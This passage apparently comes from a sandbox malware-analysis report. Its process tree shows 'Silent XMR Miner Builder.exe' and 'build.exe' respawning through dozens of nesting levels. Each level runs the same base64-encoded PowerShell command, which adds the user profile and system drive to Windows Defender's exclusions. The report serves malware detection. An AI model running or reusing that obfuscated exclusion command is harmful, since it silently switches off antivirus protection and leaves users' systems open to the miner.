        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        51⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        52⤵
        
        PID:220
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        52⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        53⤵
        
        PID:5692
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        53⤵
        
        PID:6244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        54⤵
        
        PID:6740
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        54⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        55⤵
        
        PID:6516
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        55⤵
        
        PID:6780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        56⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        56⤵
        
        PID:5480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        57⤵
        
        PID:7212
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        57⤵
        
        PID:6184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        58⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        58⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        59⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        59⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        60⤵
        
        PID:2424
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        60⤵
        
        PID:3696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        61⤵
        
        PID:6564
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        61⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        62⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        62⤵
        
        PID:7428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        63⤵
        
        PID:7780
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        63⤵
        
        PID:5980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        64⤵
        
        PID:7456
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        64⤵
        
        PID:4252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        65⤵
        
        PID:7788
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        65⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        66⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        66⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        67⤵
        
        PID:7708
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        67⤵
        
        PID:6988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        68⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        68⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        69⤵
        
        PID:3412
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        69⤵
        
        PID:7792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        70⤵
        
        PID:668
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        70⤵
        
        PID:3688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        71⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        71⤵
        
        PID:7052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        72⤵
        
        PID:7796
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        72⤵
        
        PID:5564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        73⤵
        
        PID:1432
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        73⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        74⤵
        
        PID:8020
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        74⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        75⤵
        
        PID:6212
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        75⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        76⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        76⤵
        
        PID:7568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        77⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        77⤵
        
        PID:8140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        78⤵
        
        PID:744
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        78⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        76⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        75⤵
        
        PID:3940
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        74⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        73⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        72⤵
        
        PID:6772
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        71⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        70⤵
        
        PID:5896
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        69⤵
        
        PID:1268
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        68⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        67⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        66⤵
        
        PID:6188
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        65⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        64⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        63⤵
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        62⤵
        
        PID:5708
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        61⤵
        
        PID:6840
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        60⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        59⤵
        
        PID:5372
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        58⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        57⤵
        
        PID:6644
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        56⤵
        
        PID:6632
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        55⤵
        
        PID:7512
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        54⤵
        
        PID:1256
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        53⤵
        
        PID:5828
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        52⤵
        
        PID:7688
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        51⤵
        
        PID:6476
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        50⤵
        
        PID:6036
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        49⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        48⤵
        
        PID:1392
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        47⤵
        
        PID:6292
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
